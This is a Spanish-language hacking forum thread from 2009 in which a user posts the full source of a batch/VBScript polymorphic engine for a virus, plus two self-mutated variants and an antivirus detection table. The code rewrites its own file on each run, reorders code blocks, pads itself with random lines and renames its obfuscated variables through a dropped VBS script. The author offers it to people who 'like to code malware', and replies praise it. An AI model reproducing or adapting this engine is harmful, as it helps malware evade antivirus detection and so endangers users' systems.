[V][bat-vbs] y otro motor poliformico mas

lShadowl · 22-ago-2009, 00:45

Pues pensando mas en lo que sucedio con el [Solo usuarios registrados pueden ver los links. ] y sus versiones anteriores. . .-->
_________________________________________________
Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.08.21 -
AhnLab-V3 5.0.0.2 2009.08.21 -
AntiVir 7.9.1.3 2009.08.21 HEUR/HTML.Malware
Antiy-AVL 2.0.3.7 2009.08.21 -
Authentium 5.1.2.4 2009.08.21 BAT/Ravie.A
Avast 4.8.1335.0 2009.08.21 BV:Malware-gen
AVG 8.5.0.406 2009.08.22 -
BitDefender 7.2 2009.08.22 Generic.ScriptWorm.833163F2
CAT-QuickHeal 10.00 2009.08.21 -
ClamAV 0.94.1 2009.08.22 Inf.Suspect
Comodo 2053 2009.08.22 -
DrWeb 5.0.0.12182 2009.08.21 MACRO.SCRIPT.BATCH.Virus
eSafe 7.0.17.0 2009.08.20 -
eTrust-Vet 31.6.6694 2009.08.21 -
F-Prot 4.4.4.56 2009.08.21 BAT/Ravie.A
F-Secure 8.0.14470.0 2009.08.21 -
Fortinet 3.120.0.0 2009.08.22 -
GData 19 2009.08.22 Generic.ScriptWorm.833163F2
Ikarus T3.1.1.68.0 2009.08.22 -
Jiangmin 11.0.800 2009.08.21 -
K7AntiVirus 7.10.824 2009.08.21 -
Kaspersky 7.0.0.125 2009.08.22 -
McAfee 5716 2009.08.21 -
McAfee+Artemis 5716 2009.08.21 -
McAfee-GW-Edition 6.8.5 2009.08.22 Heuristic.HTML.Malware
Microsoft 1.4903 2009.08.21 -
NOD32 4357 2009.08.21 BAT/Autorun.AC
Norman 6.01.09 2009.08.21 -
nProtect 2009.1.8.0 2009.08.22 -

(...)-->[Solo usuarios registrados pueden ver los links. ]
_________________________________________________

he trabajado sobre la base del polimorfismo de este [Solo usuarios registrados pueden ver los links. ] creando un nuevo motor de mutaciones en el que a?adi otra tecnica que se basa en modificar las variables del programa de forma aleatoria usando vbs y a?adiendo la parte de q incrementa el tama?o del script del ravie.c.

Código:

 ::Polimorphic Engine by lShadowl %ini%
 @set sdjf=fictsoehnd %ini%
 @set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %ini%
 @%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %ini%
 @%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %ini%
 @%egnkv%off %ini%
 @%agnvl: =%local enabledelayedexpansion %ini%
%egnkv%Mutando... %ini%
%fsdhf%"ini"<%0>$ %ini%
:rnd_b %ini%
call :rnd %ini%
:buc %ini%
%fsdhf%"m%r: =%"<$>nul %ini%
if %errorlevel%==0 goto :tst %ini%
%fsdhf%"m%r: =%"<%0>>$ %ini%
%agnvl%/a rdnmm=%random%*9999999 %ini%
%egnkv%::%rdnmm% %%m%r: =%%%>>$ %ini%
:tst %ini%
%agnvl%a=1 %ini%
for /L %%a in (0,1,9) do call :cmp %%a %ini%
%egnkv%%a%|%fsdhf% "o">nul %ini%
if %errorlevel%==0 goto :rnd_b %ini%
for %%a in (cmp rnd) do (set a=%%a %ini%
%fsdhf%"m!a: =!"<%0>>$) %ini%
type $>%0&& ping -n 1 localhost>nul %ini% 
%egnkv%%agnvl%dfjalds=createobject("scripting.filesystemobject")>asjdhau.vbs %ini%
%egnkv%%agnvl%kdflekj=dfjalds.opentextfile(%0,1)>>asjdhau.vbs %ini%
%egnkv%askdajs = kdflekj.readall>>asjdhau.vbs %ini%
%egnkv%kdflekj.close>>asjdhau.vbs %ini%
%egnkv%Randomize>>asjdhau.vbs %ini%
%egnkv%ahqiaohe = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%egnkv%jdfasuu = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%egnkv%dwudhqw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%egnkv%asdwdkw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%egnkv%sjdfhjs = Replace(askdajs,"sdjf",ahqiaohe)>>asjdhau.vbs %ini%
%egnkv%lasdaod = Replace(sjdfhjs,"agnvl",jdfasuu)>>asjdhau.vbs %ini%
%egnkv%skdnmxi = Replace(lasdaod,"egnkv",dwudhqw)>>asjdhau.vbs %ini%
%egnkv%sjsabwu = Replace(skdnmxi,"fsdhf",asdwdkw)>>asjdhau.vbs %ini%
%egnkv%%agnvl%skdjawuj=dfjalds.opentextfile(%0,2)>>asjdhau.vbs %ini%
%egnkv%skdjawuj.write sjsabwu>>asjdhau.vbs %ini%
asjdhau.vbs&& exit %ini%
:: CODIGO POLIMORFICO [INICIO] %ini%
:: %m5%
:: %m7%
:: %m6%
:: %m1%
:: %m2%
:: %m4%
:: %m9%
:: %m3%
:: %m0%
:: %m8%
:: CODIGO POLIMORFICO [FIN] %mcmp%
:cmp %mcmp%
%fsdhf%"m%1"<$>nul %mcmp%
if %errorlevel%==1 (%agnvl% a=%a%o %mcmp%
goto :EOF)%mcmp%
%agnvl% a=%a%x %mcmp%
goto :EOF %mcmp%
:rnd %mrnd%
%agnvl%/a r=%random%%%10 %mrnd%
goto :EOF %mrnd%

para que vean como funciona os pondre mis variantes del code despues de haberlo ejecutado dos veces:
_________________________________________________

Código:

 ::Polimorphic Engine by lShadowl %ini%
 @set pkseh=fictsoehnd %ini%
 @set cneso=%pkseh:~4,1%%pkseh:~6,1%%pkseh:~3,1% %ini%
 @%cneso%hfdjc=%pkseh:~6,1%%pkseh:~2,1%%pkseh:~7,1%%pkseh:~5,1% %ini%
 @%cneso%vchff=%pkseh:~0,2%%pkseh:~8,2% %ini%
 @%hfdjc%off %ini%
 @%cneso: =%local enabledelayedexpansion %ini%
%hfdjc%Mutando... %ini%
%vchff%"ini"<%0>$ %ini%
:rnd_b %ini%
call :rnd %ini%
:buc %ini%
%vchff%"m%r: =%"<$>nul %ini%
if %errorlevel%==0 goto :tst %ini%
%vchff%"m%r: =%"<%0>>$ %ini%
%cneso%/a rdnmm=%random%*9999999 %ini%
%hfdjc%::%rdnmm% %%m%r: =%%%>>$ %ini%
:tst %ini%
%cneso%a=1 %ini%
for /L %%a in (0,1,9) do call :cmp %%a %ini%
%hfdjc%%a%|%vchff% "o">nul %ini%
if %errorlevel%==0 goto :rnd_b %ini%
for %%a in (cmp rnd) do (set a=%%a %ini%
%vchff%"m!a: =!"<%0>>$) %ini%
type $>%0&& ping -n 1 localhost>nul %ini% 
%hfdjc%%cneso%dfjalds=createobject("scripting.filesystemobject")>asjdhau.vbs %ini%
%hfdjc%%cneso%kdflekj=dfjalds.opentextfile(%0,1)>>asjdhau.vbs %ini%
%hfdjc%askdajs = kdflekj.readall>>asjdhau.vbs %ini%
%hfdjc%kdflekj.close>>asjdhau.vbs %ini%
%hfdjc%Randomize>>asjdhau.vbs %ini%
%hfdjc%ahqiaohe = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%hfdjc%jdfasuu = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%hfdjc%dwudhqw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%hfdjc%asdwdkw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%hfdjc%sjdfhjs = Replace(askdajs,"pkseh",ahqiaohe)>>asjdhau.vbs %ini%
%hfdjc%lasdaod = Replace(sjdfhjs,"cneso",jdfasuu)>>asjdhau.vbs %ini%
%hfdjc%skdnmxi = Replace(lasdaod,"hfdjc",dwudhqw)>>asjdhau.vbs %ini%
%hfdjc%sjsabwu = Replace(skdnmxi,"vchff",asdwdkw)>>asjdhau.vbs %ini%
%hfdjc%%cneso%skdjawuj=dfjalds.opentextfile(%0,2)>>asjdhau.vbs %ini%
%hfdjc%skdjawuj.write sjsabwu>>asjdhau.vbs %ini%
asjdhau.vbs&& exit %ini%
:: CODIGO POLIMORFICO [INICIO] %ini%
:: %m5%
::-1313031124 %m5% 
:: %m1%
::2020451641 %m1% 
:: %m8%
::-1739870728 %m8% 
:: %m7%
::-443934897 %m7% 
:: %m3%
::-1117740673 %m3% 
:: %m2%
::-888192539 %m2% 
:: %m0%
::1245290346 %m0% 
:: %m6%
::-1909547966 %m6% 
:: %m4%
::-1847546953 %m4% 
:: %m9%
::191549157 %m9% 
:: CODIGO POLIMORFICO [FIN] %mcmp%
:cmp %mcmp%
%vchff%"m%1"<$>nul %mcmp%
if %errorlevel%==1 (%cneso% a=%a%o %mcmp%
goto :EOF)%mcmp%
%cneso% a=%a%x %mcmp%
goto :EOF %mcmp%
:rnd %mrnd%
%cneso%/a r=%random%%%10 %mrnd%
goto :EOF %mrnd%

_________________________________________________
_________________________________________________

Código:

 ::Polimorphic Engine by lShadowl %ini%
 @set kjefv=fictsoehnd %ini%
 @set eiotf=%kjefv:~4,1%%kjefv:~6,1%%kjefv:~3,1% %ini%
 @%eiotf%gugip=%kjefv:~6,1%%kjefv:~2,1%%kjefv:~7,1%%kjefv:~5,1% %ini%
 @%eiotf%mgvmh=%kjefv:~0,2%%kjefv:~8,2% %ini%
 @%gugip%off %ini%
 @%eiotf: =%local enabledelayedexpansion %ini%
%gugip%Mutando... %ini%
%mgvmh%"ini"<%0>$ %ini%
:rnd_b %ini%
call :rnd %ini%
:buc %ini%
%mgvmh%"m%r: =%"<$>nul %ini%
if %errorlevel%==0 goto :tst %ini%
%mgvmh%"m%r: =%"<%0>>$ %ini%
%eiotf%/a rdnmm=%random%*9999999 %ini%
%gugip%::%rdnmm% %%m%r: =%%%>>$ %ini%
:tst %ini%
%eiotf%a=1 %ini%
for /L %%a in (0,1,9) do call :cmp %%a %ini%
%gugip%%a%|%mgvmh% "o">nul %ini%
if %errorlevel%==0 goto :rnd_b %ini%
for %%a in (cmp rnd) do (set a=%%a %ini%
%mgvmh%"m!a: =!"<%0>>$) %ini%
type $>%0&& ping -n 1 localhost>nul %ini% 
%gugip%%eiotf%dfjalds=createobject("scripting.filesystemobject")>asjdhau.vbs %ini%
%gugip%%eiotf%kdflekj=dfjalds.opentextfile(%0,1)>>asjdhau.vbs %ini%
%gugip%askdajs = kdflekj.readall>>asjdhau.vbs %ini%
%gugip%kdflekj.close>>asjdhau.vbs %ini%
%gugip%Randomize>>asjdhau.vbs %ini%
%gugip%ahqiaohe = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%gugip%jdfasuu = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%gugip%dwudhqw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%gugip%asdwdkw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%gugip%sjdfhjs = Replace(askdajs,"kjefv",ahqiaohe)>>asjdhau.vbs %ini%
%gugip%lasdaod = Replace(sjdfhjs,"eiotf",jdfasuu)>>asjdhau.vbs %ini%
%gugip%skdnmxi = Replace(lasdaod,"gugip",dwudhqw)>>asjdhau.vbs %ini%
%gugip%sjsabwu = Replace(skdnmxi,"mgvmh",asdwdkw)>>asjdhau.vbs %ini%
%gugip%%eiotf%skdjawuj=dfjalds.opentextfile(%0,2)>>asjdhau.vbs %ini%
%gugip%skdjawuj.write sjsabwu>>asjdhau.vbs %ini%
asjdhau.vbs&& exit %ini%
:: CODIGO POLIMORFICO [INICIO] %ini%
:: %m7%
::-443934897 %m7% 
::525484065 %m7% 
:: %m1%
::2020451641 %m1% 
::-2018256975 %m1% 
:: %m9%
::191549157 %m9% 
::1635032111 %m9% 
:: %m2%
::-888192539 %m2% 
::1875225734 %m2% 
:: %m3%
::-1117740673 %m3% 
::1975806665 %m3% 
:: %m0%
::1245290346 %m0% 
::-39677251 %m0% 
:: %m8%
::-1739870728 %m8% 
::-568902610 %m8% 
:: %m6%
::-1909547966 %m6% 
::-1999741604 %m6% 
:: %m4%
::-1847546953 %m4% 
::1442194522 %m4% 
:: %m5%
::-1313031124 %m5% 
::-1207869762 %m5% 
:: CODIGO POLIMORFICO [FIN] %mcmp%
:cmp %mcmp%
%mgvmh%"m%1"<$>nul %mcmp%
if %errorlevel%==1 (%eiotf% a=%a%o %mcmp%
goto :EOF)%mcmp%
%eiotf% a=%a%x %mcmp%
goto :EOF %mcmp%
:rnd %mrnd%
%eiotf%/a r=%random%%%10 %mrnd%
goto :EOF %mrnd%

_________________________________________________

Como se puede ver el code demuestra el uso de las tecnicas de:
transpocision de codigo: notese el comportamiento de las lineas de codigo dentro de las lineas ":: CODIGO POLIMORFICO [INICIO] %ini%" y ":: CODIGO POLIMORFICO [FIN] %mcmp%"
incremento de tama?o: despues de cada ejecucion el codigo cambia de tama?o aumentando un numero aleatorio de bytes a?adiendo lineas como: "::-1739870728 %m8% "
variables aleatorias: notese que las cuatro primeras variables que se declaran en:

Código:

 @set sdjf=fictsoehnd %ini%
 @set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %ini%
 @%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %ini%
 @%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %ini%

osea, sdjf, agnvl, egnkv y fsdhf, que contienen las cadenas "fictsoehnd" "set" "echo" y "find", cambian en cada ejecucion del programa por medio de un sencillo script en vbs que se ejecuta al final.

Para los que les gusta codear malware, esto les puede servir de algo.

Saludos!

cuban-hack · 22-ago-2009, 05:01

exelente codig, luego con mas calma lo miro.. Otro aporte mas. y de los grandes. jaja a ver si entiendo el codigo. jajajaja

ninfas · 22-ago-2009, 06:34

Gran codigo

haber si consigo entender todo el codigo cuando tenga un rato libre :P

Se ve muy interesante

SAludos

SmartGenius · 22-ago-2009, 19:48

A ver que puedo captar de esto.... :

CodeKiller · 23-ago-2009, 06:27

Si, ciertamente te ha quedado muy pequeño (XD) Yo nada mas que entiendo pokiiisimo de ese kode; parece japones... XD ¿Que hace?

P4|3L0 · 23-ago-2009, 06:30

Cita:

Iniciado por CodeKiller (-K95-)

Si, ciertamente te ha quedado muy pequeño (XD) Yo nada mas que entiendo pokiiisimo de ese kode; parece japones... XD ¿Que hace?

Es un virus y el polimorfismo es : [Solo usuarios registrados pueden ver los links. ]

22-ago-2009, 05:01	#2
cuban-hack Senior Member Fecha de Ingreso: diciembre-2006 Mensajes: 1.121	Re: [V][bat-vbs] y otro motor poliformico mas exelente codig, luego con mas calma lo miro.. Otro aporte mas. y de los grandes. jaja a ver si entiendo el codigo. jajajaja __________________ A veces sentimos que lo que hacemos es tan solo una gota en el mar, pero el mar sería menos si le faltara una gota.<br />Alguno se estima atrevido, cuando con otros se compara. Algunos creo que hubo tan discretos que no acertaron a compararse sino a sí mismos.<br />Nuestras acciones hablan sobre nosotros tanto como nosotros sobre ellas.<br />

22-ago-2009, 06:34	#3
ninfas Senior Member Fecha de Ingreso: enero-2009 Mensajes: 576	Re: [V][bat-vbs] y otro motor poliformico mas Gran codigo haber si consigo entender todo el codigo cuando tenga un rato libre :P Se ve muy interesante SAludos __________________ Gracias a Ubuntero & Ubuntera en Arte Libre por las firmas

22-ago-2009, 19:48	#4
SmartGenius Moderador Fecha de Ingreso: mayo-2009 Mensajes: 253	Re: [V][bat-vbs] y otro motor poliformico mas A ver que puedo captar de esto.... : __________________ ¡ snıuǝƃʇɹɐɯs \\\\\\\'sopoʇ ǝp ɹoɾǝɯ lǝ<br /><br /> Invitaciones a Lockerz, por Mensaje Privado !!

23-ago-2009, 06:27	#5
CodeKiller Member Fecha de Ingreso: agosto-2009 Mensajes: 70	Re: [V][bat-vbs] y otro motor poliformico mas Si, ciertamente te ha quedado muy pequeño (XD) Yo nada mas que entiendo pokiiisimo de ese kode; parece japones... XD ¿Que hace? __________________ "Si vis pacem, para bellum... " "Si quieres paz... PREPÁRATE PARA LA GUERRA!"

Herramientas
Mostrar Versión Imprimible Enviar por Correo
Desplegado
Mode Lineal Cambiar a Modo Hibrido Cambiar a Modo Hilado